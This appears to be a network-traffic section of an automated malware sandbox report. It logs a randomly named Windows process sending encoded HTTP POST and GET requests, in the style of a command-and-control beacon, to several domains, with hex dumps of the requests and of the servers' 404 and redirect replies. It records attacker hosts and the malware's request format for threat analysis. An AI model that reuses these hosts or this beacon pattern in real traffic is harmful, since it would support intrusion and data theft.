                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.649764162.43.101.114806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:48.033787012 CEST1636OUTPOST /rxdf/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      Origin: http://www.tedjp-x.com
                                                      Referer: http://www.tedjp-x.com/rxdf/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 71 37 42 38 6e 32 42 55 4a 33 48 50 33 6d 4a 68 47 34 77 4e 74 61 35 56 31 43 6c 76 75 41 67 39 48 79 39 49 59 6c 35 64 38 62 42 74 6e 7a 53 6e 54 66 59 47 44 55 58 30 78 64 6f 77 51 49 5a 31 5a 73 51 31 78 68 54 51 32 31 4d 71 71 51 5a 79 47 4e 34 6f 45 44 38 72 35 4b 56 4e 38 71 6d 41 50 2b 4a 37 6d 30 79 6b 78 2f 47 6c 62 79 67 72 64 47 32 79 55 4b 35 31 49 4b 72 59 57 58 66 58 31 2b 5a 65 39 53 7a 34 66 4f 51 78 4d 56 50 68 36 68 6c 63 74 6e 72 75 2b 43 4f 4d 58 42 7a 58 35 4c 36 6b 75 53 67 39 7a 43 5a 44 4d 32 56 4f 46 74 36 4c 6b 54 66 46 63 61 7a 73 58 6f 68 74 50 72 72 55 77 69 36 2b 48 49 68 77 6a 72 2f 70 51 2f 32 67 77 58 41 52 38 6e 64 76 30 35 5a 55 70 37 53 75 56 50 45 31 4f 36 76 4d 58 71 34 6b 35 78 74 4c 32 2f 57 6e 73 52 36 30 4e 42 37 33 4d 4e 33 4d 41 31 31 58 67 78 7a 6c 41 71 55 39 68 5a 50 6e 66 4e 75 65 61 58 4e 77 77 38 79 51 66 6c 70 43 42 6c 73 6c 69 48 73 72 74 61 77 51 68 43 71 37 4e 62 44 71 45 72 68 4f 6c 4d 61 57 70 62 31 76 32 59 66 30 63 [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=q7B8n2BUJ3HP3mJhG4wNta5V1ClvuAg9Hy9IYl5d8bBtnzSnTfYGDUX0xdowQIZ1ZsQ1xhTQ21MqqQZyGN4oED8r5KVN8qmAP+J7m0ykx/GlbygrdG2yUK51IKrYWXfX1+Ze9Sz4fOQxMVPh6hlctnru+COMXBzX5L6kuSg9zCZDM2VOFt6LkTfFcazsXohtPrrUwi6+HIhwjr/pQ/2gwXAR8ndv05ZUp7SuVPE1O6vMXq4k5xtL2/WnsR60NB73MN3MA11XgxzlAqU9hZPnfNueaXNww8yQflpCBlsliHsrtawQhCq7NbDqErhOlMaWpb1v2Yf0cZQbuwpym4skhR8TdE4dgl6r6kcbdLfhHhTlWBeAfSjjclL2qQELfgIj4RIF898Xkd+Yv3n2+CO8CheLao5+c8TGXoDWE9eNFZD9nkQ/rgAYuFKBVbDiGC3uq5CgtAPu+QNSLPzWy2F6tidGWefP00H1KBrQtqzXqDcTSQYspKdIHL+/yS07eWXBXXY9BISTuKCIEJ5qWu3nDJQv1wPchOul2dgTc08kheMt7RCxjpzQjfgbIINFKpdzpJ4gLHyPthS1O84vxgJ39ienItpHk0Rf/E02T6Wtc4dBPKNDuviuHaHUHGQbe9QGsFfqbkTL+qOCANCLgE0hr/ikUidshK2XSpSdSs8pLldV/xkMZ9wmhyYRnr5oM1UYrWHNESmqMe3Ks4lCBH9eGLyPuDZ1i1/n+OvfjPJ+i3wY4eZBuEiQ9BCXrhj91bjkABbYYZbA6OdBdwBQ70ao3fW+oMNO6l7cLhd+xVSTExjj3wI3v+tpVAGff+EoSBkKG+z5qjLTmxE1rtFteeln5Im57SnNKFNhS8rn8VJs3Zpm21Qqon/8yoNCJ0iLsQ4y+xNf+xWyg2kIqr13aNWvto7HO4/X1Q2YO+HqlTIHMuNQYagViKHTjBwOnjsYX4ABeD+16I0oZZAMGS6Yeb/SWgEUhrH5A9mepyYbgcD2eCp [TRUNCATED]
                                                      Jul 3, 2024 17:58:48.802875996 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:28 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: W/"afe-6098b1f8c138d"
                                                      Content-Encoding: gzip
                                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                      Jul 3, 2024 17:58:48.802895069 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                      Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.649765162.43.101.114806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:50.671372890 CEST344OUTGET /rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:51.491303921 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 2814
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: "afe-6098b1f8c138d"
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
                                                      Jul 3, 2024 17:58:51.491368055 CEST1236INData Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73
                                                      Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                      Jul 3, 2024 17:58:51.491379976 CEST582INData Raw: 64 69 76 20 69 64 3d 22 62 61 73 65 22 3e 0a 20 20 20 20 3c 68 31 3e 3c 73 70 61 6e 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e
                                                      Data Ascii: div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.64976645.113.122.18806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:56.913892984 CEST617OUTPOST /n8zi/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      Origin: http://www.3cubesinterior.in
                                                      Referer: http://www.3cubesinterior.in/n8zi/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 65 42 6c 57 30 4d 67 73 2f 48 31 2b 50 36 44 41 77 59 4e 32 58 64 6c 33 41 5a 58 50 53 35 4a 62 4c 2b 68 41 36 5a 47 75 59 57 58 56 71 4e 58 52 41 59 4b 44 36 42 39 51 70 45 7a 74 42 4e 51 67 47 2f 4e 7a 41 69 51 71 51 78 77 59 4b 77 42 52 70 39 45 33 77 6a 6b 6f 34 42 6e 46 52 57 49 66 6e 54 75 76 44 4f 38 59 38 79 32 5a 55 59 43 37 6e 68 59 46 5a 56 47 77 52 4c 51 71 47 64 37 4a 47 63 47 35 4f 76 49 58 42 7a 56 52 45 6a 49 32 59 71 38 35 63 74 6d 6a 73 77 73 4c 78 39 51 45 73 79 2b 5a 79 68 47 59 39 4f 59 77 4a 62 75 4f 62 72 38 36 48 53 4c 36 37 58 75 6d 31 4b 6f 47 2b 42 32 65 4b 49 73 47 6b 78 6f 34
                                                      Data Ascii: OdjTHtuX=eBlW0Mgs/H1+P6DAwYN2Xdl3AZXPS5JbL+hA6ZGuYWXVqNXRAYKD6B9QpEztBNQgG/NzAiQqQxwYKwBRp9E3wjko4BnFRWIfnTuvDO8Y8y2ZUYC7nhYFZVGwRLQqGd7JGcG5OvIXBzVREjI2Yq85ctmjswsLx9QEsy+ZyhGY9OYwJbuObr86HSL67Xum1KoG+B2eKIsGkxo4


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.64976745.113.122.18806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:59.967823982 CEST641OUTPOST /n8zi/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      Origin: http://www.3cubesinterior.in
                                                      Referer: http://www.3cubesinterior.in/n8zi/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 65 42 6c 57 30 4d 67 73 2f 48 31 2b 50 61 54 41 79 37 6c 32 41 74 6c 6f 46 5a 58 50 62 5a 4a 66 4c 2b 74 41 36 59 7a 32 5a 6b 6a 56 71 73 6e 52 42 63 65 44 76 42 39 51 37 6b 7a 6b 50 74 51 2b 47 34 46 37 41 6a 73 71 51 78 4d 59 4b 30 46 52 70 4f 73 32 71 54 6c 4f 6a 52 6e 4c 56 57 49 66 6e 54 75 76 44 4f 6f 79 38 79 2b 5a 55 4c 4b 37 6e 46 45 4b 61 56 47 33 47 37 51 71 43 64 37 4e 47 63 48 57 4f 72 51 39 42 31 4a 52 45 6d 73 32 4a 62 38 36 46 39 6d 6c 6f 77 74 46 38 66 74 32 70 53 7a 38 36 51 75 34 6d 2f 63 32 4d 74 76 55 48 59 38 5a 56 43 72 34 37 56 32 55 31 71 6f 73 38 42 4f 65 59 66 67 68 72 46 4e 62 6c 43 65 5a 35 61 31 6f 32 41 65 77 57 2b 6c 48 4e 6b 46 65 50 41 3d 3d
                                                      Data Ascii: OdjTHtuX=eBlW0Mgs/H1+PaTAy7l2AtloFZXPbZJfL+tA6Yz2ZkjVqsnRBceDvB9Q7kzkPtQ+G4F7AjsqQxMYK0FRpOs2qTlOjRnLVWIfnTuvDOoy8y+ZULK7nFEKaVG3G7QqCd7NGcHWOrQ9B1JREms2Jb86F9mlowtF8ft2pSz86Qu4m/c2MtvUHY8ZVCr47V2U1qos8BOeYfghrFNblCeZ5a1o2AewW+lHNkFePA==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.64976945.113.122.18806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:02.519221067 CEST1654OUTPOST /n8zi/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      Origin: http://www.3cubesinterior.in
                                                      Referer: http://www.3cubesinterior.in/n8zi/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 65 42 6c 57 30 4d 67 73 2f 48 31 2b 50 61 54 41 79 37 6c 32 41 74 6c 6f 46 5a 58 50 62 5a 4a 66 4c 2b 74 41 36 59 7a 32 5a 6b 62 56 71 2b 2f 52 41 2b 32 44 70 78 39 51 67 6b 7a 68 50 74 52 37 47 35 68 2f 41 6a 68 52 51 33 49 59 49 58 4e 52 72 2f 73 32 2f 44 6c 4f 71 78 6e 4b 52 57 4a 4c 6e 54 2b 56 44 4f 34 79 38 79 2b 5a 55 4b 61 37 33 42 59 4b 57 31 47 77 52 4c 51 32 47 64 37 31 47 63 75 68 4f 72 64 49 42 44 35 52 45 47 38 32 4c 4a 45 36 4e 39 6d 64 6b 51 73 59 38 66 68 74 70 53 76 57 36 51 71 43 6d 39 41 32 50 59 66 43 59 62 4d 5a 4d 44 7a 66 6d 69 4f 57 78 4e 6f 72 2b 6a 2b 42 63 4f 45 37 6b 52 46 51 6f 56 36 2f 76 4d 67 63 37 69 36 48 57 2b 46 58 48 45 45 4b 59 67 37 59 71 66 78 39 37 68 5a 39 68 50 50 75 78 4c 52 63 57 72 6a 73 4c 41 36 67 7a 77 76 66 2f 71 4f 32 49 6d 38 42 43 30 6f 4e 46 59 70 38 52 54 2f 4d 39 71 53 6a 7a 31 63 79 4c 2b 41 4d 48 59 74 30 69 58 64 6d 41 4e 4c 74 73 2f 33 67 48 30 4b 75 44 51 37 6d 65 71 36 43 73 70 57 45 36 4b 70 45 6b 41 68 62 52 [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=eBlW0Mgs/H1+PaTAy7l2AtloFZXPbZJfL+tA6Yz2ZkbVq+/RA+2Dpx9QgkzhPtR7G5h/AjhRQ3IYIXNRr/s2/DlOqxnKRWJLnT+VDO4y8y+ZUKa73BYKW1GwRLQ2Gd71GcuhOrdIBD5REG82LJE6N9mdkQsY8fhtpSvW6QqCm9A2PYfCYbMZMDzfmiOWxNor+j+BcOE7kRFQoV6/vMgc7i6HW+FXHEEKYg7Yqfx97hZ9hPPuxLRcWrjsLA6gzwvf/qO2Im8BC0oNFYp8RT/M9qSjz1cyL+AMHYt0iXdmANLts/3gH0KuDQ7meq6CspWE6KpEkAhbRcRVoydSne4j655jI6E4KnpKftrdfICOOBRdgfocJX0lnBtZDiQZLdE126G0yXxs5oEpRrGqf9eYB/3N0ey1R8NJSJBo/bX7AeMbHaP9gPCRu6s1K7j81BgMnsfDvpzU74+Vh3UAQ87/8FDV417PV0a1RB5Rb2u8mUy8ZrWM5NpXeeoetOiDER0gFl/HkjJBtn+nYjNOsr3xAhj/sgbi3Rdvcis2c73TelK1Jmn2ew5w2mVHfgXJgQ1Mya0lLH1ziDwZqZI5LIaUShDmJjyVYW/AtvF6Mcwzo2mpocVuNt0IawdySX2RJjnsT0qkE+cI1MzxI4g1pcj+XfMhqYoHuJ14Uhl3rkHC0UGR7UiglutlifohSNDoWFV0Wke128hlufrFdqXBRcx/YstpowIMGC81hxCdjQEZDuc/dyOOgFwue45YqzG41Jr3yaTHfnPNpvxayYlQ74HoRpQVQN49EpFh6gbFWJ5sOSC3nuVYpHCMStjAOMK4qzSCbzw87WLFz2Q+5WWHnby7wmJuAClEWLImKZ3AL77bxPxDrUdCVsPPV3QeOz2K3HhfadM7kvqXRXKFoq9AmIuT/uiloQrdV4sovmsS+xx0bXlLn1lPyTPwtGb/KEK7RdbqgcrHZ6g9rAjyO0k4d4/LjNMWLbiGFEvEVO32iK2/pBJ [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.64977045.113.122.18806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:05.078006029 CEST350OUTGET /n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:06.416336060 CEST514INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 03 Jul 2024 15:59:06 GMT
                                                      Server: nginx/1.23.4
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 0
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      X-Redirect-By: WordPress
                                                      Location: http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=
                                                      X-Server-Cache: true
                                                      X-Proxy-Cache: MISS


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.649771142.250.74.211806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:16.653633118 CEST626OUTPOST /s0j2/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      Origin: http://www.artvectorcraft.store
                                                      Referer: http://www.artvectorcraft.store/s0j2/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 4d 65 70 64 30 6b 6e 46 5a 42 43 4d 34 43 65 53 30 67 67 32 4b 59 73 75 69 54 33 32 76 46 7a 4f 72 66 69 69 71 53 74 55 56 33 35 57 74 6f 59 75 4a 67 30 32 37 4d 48 4a 71 5a 44 41 63 62 7a 67 36 54 74 74 73 6d 53 67 6e 63 53 33 76 78 6c 41 33 56 71 37 6d 77 33 7a 31 4e 56 36 77 6f 38 41 2f 63 6c 35 55 51 51 58 61 79 74 6d 6f 48 4f 74 37 41 66 51 2b 42 31 38 43 6e 39 63 71 2f 4e 4b 69 59 37 62 72 56 73 37 30 58 6e 56 78 49 36 4b 37 57 30 57 4a 71 45 35 4a 53 46 76 6a 49 61 6f 51 4e 67 52 66 38 6c 32 74 69 63 54 5a 67 70 4e 62 63 54 48 58 2b 72 6f 73 55 34 31 46 63 66 6b 69 6e 64 67 4a 77 59 4a 52 4a 31 57
                                                      Data Ascii: OdjTHtuX=Mepd0knFZBCM4CeS0gg2KYsuiT32vFzOrfiiqStUV35WtoYuJg027MHJqZDAcbzg6TttsmSgncS3vxlA3Vq7mw3z1NV6wo8A/cl5UQQXaytmoHOt7AfQ+B18Cn9cq/NKiY7brVs70XnVxI6K7W0WJqE5JSFvjIaoQNgRf8l2ticTZgpNbcTHX+rosU41FcfkindgJwYJRJ1W
                                                      Jul 3, 2024 17:59:17.305421114 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1566
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
